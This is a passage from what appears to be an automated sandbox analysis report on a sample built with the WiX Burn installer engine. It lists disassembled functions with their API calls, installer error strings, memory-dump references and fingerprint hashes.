                                                                                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 0095A390
                                                                                                                                                                  • ___TypeMatch.LIBVCRUNTIME ref: 0095A49E
                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 0095A5F0
                                                                                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 0095A60B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                  • API String ID: 2751267872-393685449
                                                                                                                                                                  • Opcode ID: 5bfdaee57d56d6a3ac0ea5df0102247b4b78952c2367b6690bdd0c3fcd4abf87
                                                                                                                                                                  • Instruction ID: 90f8b5ab3608b072aee7588049b460fbe1277d363c868fca5bc2a546c12996aa
                                                                                                                                                                  • Opcode Fuzzy Hash: 5bfdaee57d56d6a3ac0ea5df0102247b4b78952c2367b6690bdd0c3fcd4abf87
                                                                                                                                                                  • Instruction Fuzzy Hash: 23B18B71800209DFCF15DFA6C881AAEBBB9BF54312F144659FC016B212E335DA59CF9A
                                                                                                                                                                  Function 0094840B Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 245COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,0097E860,000000FF,00000000,000000FF,00000000,00000000,?,00916CF2,00000000), ref: 00948482
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to plan action for target product., xrefs: 0094852F
                                                                                                                                                                  • Failed to insert execute action., xrefs: 009484E7
                                                                                                                                                                  • Failed to grow array of ordered patches., xrefs: 0094864E
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\mspengine.cpp, xrefs: 00948541
                                                                                                                                                                  • Failed to copy target product code., xrefs: 009485AD
                                                                                                                                                                  • Failed to get msp ui options., xrefs: 009485F5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed to copy target product code.$Failed to get msp ui options.$Failed to grow array of ordered patches.$Failed to insert execute action.$Failed to plan action for target product.$d:\a\wix4\wix4\src\burn\engine\mspengine.cpp
                                                                                                                                                                  • API String ID: 1825529933-3199010431
                                                                                                                                                                  • Opcode ID: 1998b5b895c1f23ab94a4896b1fe0e0cf8a456faae556837d759355c8597c26e
                                                                                                                                                                  • Instruction ID: 6481997bc934edffb6ee3629480e543f6ea6bd7c56df38449c96843cd52c0a1e
                                                                                                                                                                  • Opcode Fuzzy Hash: 1998b5b895c1f23ab94a4896b1fe0e0cf8a456faae556837d759355c8597c26e
                                                                                                                                                                  • Instruction Fuzzy Hash: 28A13A75A00209EFCB15DF94C985FAEB7B8BF48714F1145A9E905AB392DB70EE40CB90
                                                                                                                                                                  Function 0091C5DE Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 152COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,00000001,00000000,?,00000000,?,7FFFFFFF,00000000,00000001,7FFFFFFF,00000000,00000009,00000000,feclient.dll,?), ref: 0091C6C7
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,00000001,00000000,?,00000000,?,7FFFFFFF,00000000,00000001,7FFFFFFF,00000000,00000009,00000000,feclient.dll,?), ref: 0091C72F
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,00000001,00000000,?,00000000,?,7FFFFFFF,00000000,00000001,7FFFFFFF,00000000,00000009,00000000,feclient.dll,?), ref: 0091C763
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed to get length of left string: %ls$Failed to get length of right string: %ls$d:\a\wix4\wix4\src\burn\engine\condition.cpp$feclient.dll
                                                                                                                                                                  • API String ID: 1825529933-1973728300
                                                                                                                                                                  • Opcode ID: 56ec03c678ce219f610454f4dbc6aa951461a6fa277b1915f944858df1483a8e
                                                                                                                                                                  • Instruction ID: a36390b2fc7cd59d5dfb1ff5da37141482fe187bb594a7240cb3f234118dbe66
                                                                                                                                                                  • Opcode Fuzzy Hash: 56ec03c678ce219f610454f4dbc6aa951461a6fa277b1915f944858df1483a8e
                                                                                                                                                                  • Instruction Fuzzy Hash: 2951CEB6F4010DBBCF129E98CC41FEE77B9EB48350F114425F925A72A0C3B09E909BA0
                                                                                                                                                                  Function 0097546B Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 135registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00974F04: lstrlenW.KERNEL32(00917162,00916DEA,?,?,?,00975488,00917162,00916DEA,00916EC2,00916DEA,00916DEA,?,?,?,00930D28,0D8C6817), ref: 00974F2A
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00916EDE,00916DEA,00916DEA,00020019,00916EDE,00917162,00916DEA,00916EC2,00916DEA,00916DEA,?,?,?,00930D28,0D8C6817,8B000137), ref: 009755BC
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get the id for the dependency "%ls"., xrefs: 00975521
                                                                                                                                                                  • Failed to get the version for the dependency "%ls"., xrefs: 0097559B
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 009755A7
                                                                                                                                                                  • Failed to allocate the registry key for dependency "%ls"., xrefs: 0097548F
                                                                                                                                                                  • Failed to get the name for the dependency "%ls"., xrefs: 0097555E
                                                                                                                                                                  • Failed to open the registry key for the dependency "%ls"., xrefs: 009754D8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Closelstrlen
                                                                                                                                                                  • String ID: Failed to allocate the registry key for dependency "%ls".$Failed to get the id for the dependency "%ls".$Failed to get the name for the dependency "%ls".$Failed to get the version for the dependency "%ls".$Failed to open the registry key for the dependency "%ls".$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp
                                                                                                                                                                  • API String ID: 3903209405-4075874421
                                                                                                                                                                  • Opcode ID: 37d9e2d73e558cfc3048eb22cc4c206cc09516461a6529a8e92759da0c3935ac
                                                                                                                                                                  • Instruction ID: 6756f5f726ffc4ad249ed9577f326cd046ef6ddcd5d64b753c13932b1ddabc15
                                                                                                                                                                  • Opcode Fuzzy Hash: 37d9e2d73e558cfc3048eb22cc4c206cc09516461a6529a8e92759da0c3935ac
                                                                                                                                                                  • Instruction Fuzzy Hash: 76411773E40A65FBDF316E948C46FAF7E299B40720F178129BA087B191D2F54E80D6D0
                                                                                                                                                                  Function 00973275 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • MoveFileExW.KERNEL32(?,?,00000000,80004005,?,?,?,00973404,?,?,00000000,?,?,00000000), ref: 00973294
                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,?,00973404,?,?,00000000,?,?,00000000,?,?,0092C66A,?,?,00000001), ref: 009732A3
                                                                                                                                                                    • Part of subcall function 0097343B: FindFirstFileW.KERNEL32(00916DEA,?,00916DEA,00916DEA,00000000), ref: 00973476
                                                                                                                                                                    • Part of subcall function 0097343B: FindClose.KERNEL32(00000000), ref: 00973482
                                                                                                                                                                  • MoveFileExW.KERNEL32(?,?,00000000,?,00000000,?,?,00973404,?,?,00000000,?,?,00000000), ref: 0097335E
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00973404,?,?,00000000,?,?,00000000,?,?,0092C66A,?,?,00000001,00000001), ref: 00973368
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$ErrorFindLastMove$CloseFirst
                                                                                                                                                                  • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp$failed to create directory while moving file: '%ls' to: '%ls'$failed to move file: '%ls' to: '%ls'
                                                                                                                                                                  • API String ID: 3479031965-4053860161
                                                                                                                                                                  • Opcode ID: ec54358a29847d5dd313921bd9b03054697c945054ca63382c721232fcefdb46
                                                                                                                                                                  • Instruction ID: 38e9aa8d64dcd254f08536e2d697eaa3fd395a288b522c2861106a9f916690f0
                                                                                                                                                                  • Opcode Fuzzy Hash: ec54358a29847d5dd313921bd9b03054697c945054ca63382c721232fcefdb46
                                                                                                                                                                  • Instruction Fuzzy Hash: 6B31F237640225B7DB310A658C01FAE766DAF95BA0F51C425FD18AB1D1EA70CF41A6D0
                                                                                                                                                                  Function 00929996 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 121registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00916CF2,00000000,00000000,00000001,00000000,00000000,00000390,000000F8,00916CF2,009331C1,00000000,00000000,8D18C483,5350F845,00020006), ref: 00929A73
                                                                                                                                                                    • Part of subcall function 00927A4E: RegCloseKey.ADVAPI32(00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006,00000000), ref: 00927CDA
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to update resume mode., xrefs: 00929A4B
                                                                                                                                                                  • Failed to update name and publisher., xrefs: 00929ACB
                                                                                                                                                                  • Failed to open registration key., xrefs: 00929A9B
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 00929A10, 00929A5D
                                                                                                                                                                  • Failed to update estimated size., xrefs: 00929AFA
                                                                                                                                                                  • Failed to delete registration key: %ls, xrefs: 009299FE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to delete registration key: %ls$Failed to open registration key.$Failed to update estimated size.$Failed to update name and publisher.$Failed to update resume mode.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                  • API String ID: 3535843008-4174111784
                                                                                                                                                                  • Opcode ID: 7890c2560d6fa2ce0f8e37ea0a357d2d46e9838f6087fcd8057d2f05229320f1
                                                                                                                                                                  • Instruction ID: f28a455e8a023c369ae71d50d83e55dc1417e88c3e5e3f304a3ef8b9d70a1fd8
                                                                                                                                                                  • Opcode Fuzzy Hash: 7890c2560d6fa2ce0f8e37ea0a357d2d46e9838f6087fcd8057d2f05229320f1
                                                                                                                                                                  • Instruction Fuzzy Hash: 53310632A44735BBDF23AEA09C06FEFBA29AF45B10F100150FA0475194D7B19A60E7D1
                                                                                                                                                                  Function 0093063D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to check the dictionary of unique dependencies., xrefs: 009306B1
                                                                                                                                                                  • Failed to add "%ls" to the list of dependencies to ignore., xrefs: 0093074E
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\dependency.cpp, xrefs: 00930676, 009306C3, 00930760
                                                                                                                                                                  • ALL, xrefs: 00930702
                                                                                                                                                                  • Failed to add "%ls" to the string dictionary., xrefs: 0093073A
                                                                                                                                                                  • Failed to create the string dictionary., xrefs: 00930664
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: ALL$Failed to add "%ls" to the list of dependencies to ignore.$Failed to add "%ls" to the string dictionary.$Failed to check the dictionary of unique dependencies.$Failed to create the string dictionary.$d:\a\wix4\wix4\src\burn\engine\dependency.cpp
                                                                                                                                                                  • API String ID: 0-461799926
                                                                                                                                                                  • Opcode ID: 7c9127d61cbf3dba0228c6b06b39cd99a67ca77bffb2b7ade3f3115321196ffb
                                                                                                                                                                  • Instruction ID: df10d1f1e9a5c313922b68a423c280397af49b52dea6b1eb99ad7f512c9318d7
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c9127d61cbf3dba0228c6b06b39cd99a67ca77bffb2b7ade3f3115321196ffb
                                                                                                                                                                  • Instruction Fuzzy Hash: 6E31CBB1A85328B6DB2166548C5BF9F3968DBC1F64F100250FA05BA2C2E2F06D509FB1
                                                                                                                                                                  Function 009402E1 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 111registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,-80000001,?,00020019,?,?,?,00000000,?,?,?,?,00940576,?,00000000,8000FFFF), ref: 00940415
                                                                                                                                                                  Strings
                                                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\, xrefs: 0094033A
                                                                                                                                                                  • QuietUninstallString, xrefs: 009403C6
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\bundlepackageengine.cpp, xrefs: 009403AD, 009403FF
                                                                                                                                                                  • Failed to read QuietUninstallString., xrefs: 009403ED
                                                                                                                                                                  • Failed to open registry key: %ls., xrefs: 0094039B
                                                                                                                                                                  • Failed to build full key path., xrefs: 0094034A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to build full key path.$Failed to open registry key: %ls.$Failed to read QuietUninstallString.$QuietUninstallString$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$d:\a\wix4\wix4\src\burn\engine\bundlepackageengine.cpp
                                                                                                                                                                  • API String ID: 3535843008-1706903631
                                                                                                                                                                  • Opcode ID: 7f8e1212a61316a244fad932483d16a746d73cfd02bbaf701bb5704c6536a730
                                                                                                                                                                  • Instruction ID: 4127126b6f5749a14675c7b41ba99bffdce4eb7f5c2693d9b9082290dfe96501
                                                                                                                                                                  • Opcode Fuzzy Hash: 7f8e1212a61316a244fad932483d16a746d73cfd02bbaf701bb5704c6536a730
                                                                                                                                                                  • Instruction Fuzzy Hash: 45313872A40316FFDF319F988C42F9FBFA89F84B00F154529FA45B6291E2B19D908690
                                                                                                                                                                  Function 009773A0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 108registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp,0000011E,80070057,?,?,?), ref: 009774BC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: An invalid parameter was passed to the function.$Failed to locate and query bundle variable.$Failed to read string shared variable.$Reading bundle variable of type 0x%x not implemented.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp$variables
                                                                                                                                                                  • API String ID: 3535843008-2641142750
                                                                                                                                                                  • Opcode ID: 39cbb2c30bb71dffd9d4f064f608ebbf2838259d8e429c955d701d6623ddbdee
                                                                                                                                                                  • Instruction ID: d1ce941dd6bb35bf496309571fdd993e932bf576b133096e6c256c2ed5fb1278
                                                                                                                                                                  • Opcode Fuzzy Hash: 39cbb2c30bb71dffd9d4f064f608ebbf2838259d8e429c955d701d6623ddbdee
                                                                                                                                                                  • Instruction Fuzzy Hash: B531F733E48218B7C7215DD58C49FAFFE7EDB81754F04C165B609B62A1D2758E00C6E0
                                                                                                                                                                  Function 00915810 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,?,?,00911CD0,?,00000105,00000000,?,00000000,?,?), ref: 00915832
                                                                                                                                                                  • HeapReAlloc.KERNEL32(00000000,?,00911CD0,?,00000105,00000000,?,00000000,?,?,?,?,009129D8,?,?,00000000), ref: 00915839
                                                                                                                                                                    • Part of subcall function 0091540B: GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
                                                                                                                                                                    • Part of subcall function 0091540B: RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
                                                                                                                                                                  • _memcpy_s.LIBCMT ref: 009158BD
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$Process$AllocAllocate_memcpy_s
                                                                                                                                                                  • String ID: Failed to get current memory size.$Failed to get new memory size.$Failed to reallocate memory$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\memutil.cpp
                                                                                                                                                                  • API String ID: 3866612605-1266056832
                                                                                                                                                                  • Opcode ID: ff86f3b7a7ec6ea65dbe38ad3c333d6490d1dd70485f61ee7e0cb0f2a8462190
                                                                                                                                                                  • Instruction ID: 48d0d150cfd875c21545a0829aa6e0a0c1b9b6331d89fcb1d228c318a6562488
                                                                                                                                                                  • Opcode Fuzzy Hash: ff86f3b7a7ec6ea65dbe38ad3c333d6490d1dd70485f61ee7e0cb0f2a8462190
                                                                                                                                                                  • Instruction Fuzzy Hash: 8231E732B40B0DFBEB11AE54CC45FEF3A69DBC0760F134164F904AA291D6B1CD91A7A0
                                                                                                                                                                  Function 0096C3C7 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 100registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegSetValueExW.ADVAPI32(?,?,0096D811,00916CF2,009331C1,009331C1,00000001,?,009279A8,009331C1,DisplayName,00000000,00916CF2,009331C1,00000000,00916CF2), ref: 0096C42D
                                                                                                                                                                  • RegDeleteValueW.ADVAPI32(?,?,0096D811,00916CF2,009331C1,009331C1,00000001,?,009279A8,009331C1,DisplayName,00000000,00916CF2,009331C1,00000000,00916CF2), ref: 0096C47F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$Delete
                                                                                                                                                                  • String ID: DisplayName$Failed to delete registry value: %ls$Failed to determine length of registry value: %ls$Failed to set registry value: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                  • API String ID: 1738766685-322587201
                                                                                                                                                                  • Opcode ID: 16cffa69b71937da71e8b5153261c4b9addf4e7ca8a8924178ea9e730bfb7278
                                                                                                                                                                  • Instruction ID: 86da3b0732290d54ecbe046919bb5250088484f29ab768d8be738ad94ead51f8
                                                                                                                                                                  • Opcode Fuzzy Hash: 16cffa69b71937da71e8b5153261c4b9addf4e7ca8a8924178ea9e730bfb7278
                                                                                                                                                                  • Instruction Fuzzy Hash: 22210AB7204229B7EB119B158C15FBF3A6DDFC6760F158025FE59AB2A0DE30CD0296B0
                                                                                                                                                                  Function 0096997A Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 83COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CommandLineToArgvW.SHELL32(00000000,00916570,00000000,00916570,00000000,00000000,ignored ,00000000,00000000,00000000,?,?,?,00917B19,00000000,?), ref: 009699E1
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00917B19,00000000,?,?,00000003,00000000,00916570,00000000,?,?,?,?,?), ref: 009699EB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
